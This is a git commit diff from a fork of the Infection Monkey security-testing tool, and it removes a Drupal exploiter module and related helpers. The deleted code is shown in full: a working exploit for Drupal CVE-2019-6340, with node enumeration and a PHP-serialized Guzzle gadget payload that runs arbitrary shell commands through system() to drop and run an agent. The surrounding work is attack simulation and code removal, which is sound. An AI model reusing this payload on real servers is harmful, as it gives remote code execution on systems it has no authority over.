forked from p34709852/monkey
Agent: Remove DrupalExploiter and related code
This commit is contained in:
parent
7b3b17251a
commit
6052ca8fcc
|
@ -1,13 +1,4 @@
|
|||
import re
|
||||
from typing import Optional, Tuple
|
||||
from urllib.parse import urlparse
|
||||
|
||||
|
||||
def remove_port(url):
|
||||
parsed = urlparse(url)
|
||||
with_port = f"{parsed.scheme}://{parsed.netloc}"
|
||||
without_port = re.sub(":[0-9]+(?=$|/)", "", with_port)
|
||||
return without_port
|
||||
|
||||
|
||||
def address_to_ip_port(address: str) -> Tuple[str, Optional[str]]:
|
||||
|
|
|
@ -1,197 +0,0 @@
|
|||
"""
|
||||
Remote Code Execution on Drupal server - CVE-2019-6340
|
||||
Implementation is based on:
|
||||
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
|
||||
/f9f6a5bb6605745e292bee3a4079f261d891738a.
|
||||
"""
|
||||
|
||||
import logging
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
|
||||
from common.network.network_utils import remove_port
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import ID_STRING
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class DrupalExploiter(WebRCE):
|
||||
_EXPLOITED_SERVICE = "Drupal Server"
|
||||
|
||||
def __init__(self, host):
|
||||
super(DrupalExploiter, self).__init__(host)
|
||||
|
||||
def get_exploit_config(self):
|
||||
"""
|
||||
We override this function because the exploits requires a special extension in the URL,
|
||||
"node",
|
||||
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
|
||||
:return: the Drupal exploit config
|
||||
"""
|
||||
exploit_config = super(DrupalExploiter, self).get_exploit_config()
|
||||
exploit_config["url_extensions"] = [
|
||||
"node/", # In Linux, no path is added
|
||||
"drupal/node/",
|
||||
] # However, Bitnami installations are under /drupal
|
||||
exploit_config["dropper"] = True
|
||||
return exploit_config
|
||||
|
||||
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
|
||||
"""
|
||||
We need a specific implementation of this function in order to add the URLs *with the
|
||||
node IDs*.
|
||||
We therefore check, for every potential URL, all possible node IDs.
|
||||
:param potential_urls: Potentially-vulnerable URLs
|
||||
:param stop_checking: Stop if one vulnerable URL is found
|
||||
:return: None (in-place addition)
|
||||
"""
|
||||
for url in potential_urls:
|
||||
try:
|
||||
node_ids = find_exploitbale_article_ids(url)
|
||||
if node_ids is None:
|
||||
logger.info("Could not find a Drupal node to attack")
|
||||
continue
|
||||
for node_id in node_ids:
|
||||
node_url = urljoin(url, str(node_id))
|
||||
if self.check_if_exploitable(node_url):
|
||||
self.add_vuln_url(
|
||||
url
|
||||
) # This is for report. Should be refactored in the future
|
||||
self.vulnerable_urls.append(node_url)
|
||||
if stop_checking:
|
||||
break
|
||||
except Exception as e: # We still don't know which errors to expect
|
||||
logger.error(f"url {url} failed in exploitability check: {e}")
|
||||
if not self.vulnerable_urls:
|
||||
logger.info("No vulnerable urls found")
|
||||
|
||||
def check_if_exploitable(self, url):
|
||||
"""
|
||||
Check if a certain URL is exploitable.
|
||||
We use this specific implementation (and not simply run self.exploit) because this
|
||||
function does not "waste"
|
||||
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
|
||||
:param url: Drupal's URL and port
|
||||
:return: Vulnerable URL if exploitable, otherwise False
|
||||
"""
|
||||
payload = build_exploitability_check_payload(url)
|
||||
|
||||
response = requests.get( # noqa: DUO123
|
||||
f"{url}?_format=hal_json",
|
||||
json=payload,
|
||||
headers={"Content-Type": "application/hal+json"},
|
||||
verify=False,
|
||||
timeout=MEDIUM_REQUEST_TIMEOUT,
|
||||
)
|
||||
|
||||
if is_response_cached(response):
|
||||
logger.info(f"Checking if node {url} is vuln returned cache HIT, ignoring")
|
||||
return False
|
||||
|
||||
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
|
||||
|
||||
def exploit(self, url, command):
|
||||
# pad a easy search replace output:
|
||||
cmd = f"echo {ID_STRING} && {command}"
|
||||
base = remove_port(url)
|
||||
payload = build_cmd_execution_payload(base, cmd)
|
||||
|
||||
r = requests.get( # noqa: DUO123
|
||||
f"{url}?_format=hal_json",
|
||||
json=payload,
|
||||
headers={"Content-Type": "application/hal+json"},
|
||||
verify=False,
|
||||
timeout=LONG_REQUEST_TIMEOUT,
|
||||
)
|
||||
|
||||
if is_response_cached(r):
|
||||
logger.info(f"Exploiting {url} returned cache HIT, may have failed")
|
||||
|
||||
if ID_STRING not in r.text:
|
||||
logger.warning("Command execution _may_ have failed")
|
||||
|
||||
result = r.text.split(ID_STRING)[-1]
|
||||
return result
|
||||
|
||||
def get_target_url(self):
|
||||
"""
|
||||
We're overriding this method such that every time self.exploit is invoked, we use a fresh
|
||||
vulnerable URL.
|
||||
Reusing the same URL eliminates its exploitability because of caching reasons :)
|
||||
:return: vulnerable URL to exploit
|
||||
"""
|
||||
return self.vulnerable_urls.pop()
|
||||
|
||||
def are_vulnerable_urls_sufficient(self):
|
||||
"""
|
||||
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
|
||||
:return: Whether the list of vulnerable URLs has at least 5 elements.
|
||||
"""
|
||||
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
|
||||
# chmod it and run it.
|
||||
num_urls_needed_for_full_exploit = 5
|
||||
num_available_urls = len(self.vulnerable_urls)
|
||||
result = num_available_urls >= num_urls_needed_for_full_exploit
|
||||
if not result:
|
||||
logger.info(
|
||||
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
|
||||
f"Drupal server "
|
||||
f"but only {num_available_urls} found"
|
||||
)
|
||||
return result
|
||||
|
||||
|
||||
def is_response_cached(r: requests.Response) -> bool:
|
||||
"""Check if a response had the cache header."""
|
||||
return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"
|
||||
|
||||
|
||||
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
|
||||
"""Find target articles that do not 404 and are not cached"""
|
||||
articles = set()
|
||||
while lower < upper:
|
||||
node_url = urljoin(base_url, str(lower))
|
||||
response = requests.get( # noqa: DUO123
|
||||
node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
|
||||
)
|
||||
if response.status_code == 200:
|
||||
if is_response_cached(response):
|
||||
logger.info(f"Found a cached article at: {node_url}, skipping")
|
||||
else:
|
||||
articles.add(lower)
|
||||
lower += 1
|
||||
return articles
|
||||
|
||||
|
||||
def build_exploitability_check_payload(url):
|
||||
payload = {
|
||||
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
|
||||
"type": {"target_id": "article"},
|
||||
"title": {"value": "My Article"},
|
||||
"body": {"value": ""},
|
||||
}
|
||||
return payload
|
||||
|
||||
|
||||
def build_cmd_execution_payload(base, cmd):
|
||||
payload = {
|
||||
"link": [
|
||||
{
|
||||
"value": "link",
|
||||
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
|
||||
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
|
||||
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
|
||||
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
|
||||
's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
|
||||
'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
|
||||
'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
|
||||
'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
|
||||
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
|
||||
}
|
||||
],
|
||||
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
|
||||
}
|
||||
return payload
|
|
@ -85,9 +85,6 @@ class WebRCE(HostExploiter):
|
|||
)
|
||||
self.add_vulnerable_urls(potential_urls, exploit_config["stop_checking_urls"])
|
||||
|
||||
if not self.are_vulnerable_urls_sufficient():
|
||||
return False
|
||||
|
||||
# Upload the right monkey to target
|
||||
data = self.upload_monkey(self.get_target_url(), exploit_config["upload_commands"])
|
||||
|
||||
|
@ -424,18 +421,7 @@ class WebRCE(HostExploiter):
|
|||
"""
|
||||
This method allows "configuring" the way in which a vulnerable URL is picked.
|
||||
If the same URL should be used - always return the first.
|
||||
Otherwise - implement your own (e.g. Drupal must use a new URI each time).
|
||||
Otherwise - implement your own.
|
||||
:return: a vulnerable URL
|
||||
"""
|
||||
return self.vulnerable_urls[0]
|
||||
|
||||
def are_vulnerable_urls_sufficient(self):
|
||||
"""
|
||||
Determine whether the number of vulnerable URLs is sufficient in order to perform the
|
||||
full attack.
|
||||
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
|
||||
vulnerable URL is for
|
||||
single use, thus we need a couple of them.
|
||||
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
|
||||
"""
|
||||
return len(self.vulnerable_urls) > 0
|
||||
|
|
|
@ -1,13 +1,4 @@
|
|||
from unittest import TestCase
|
||||
|
||||
from common.network.network_utils import address_to_ip_port, remove_port
|
||||
|
||||
|
||||
class TestNetworkUtils(TestCase):
|
||||
def test_remove_port_from_url(self):
|
||||
assert remove_port("https://google.com:80") == "https://google.com"
|
||||
assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8"
|
||||
assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com"
|
||||
from common.network.network_utils import address_to_ip_port
|
||||
|
||||
|
||||
def test_address_to_ip_port():
|
||||
|
|
Loading…
Reference in New Issue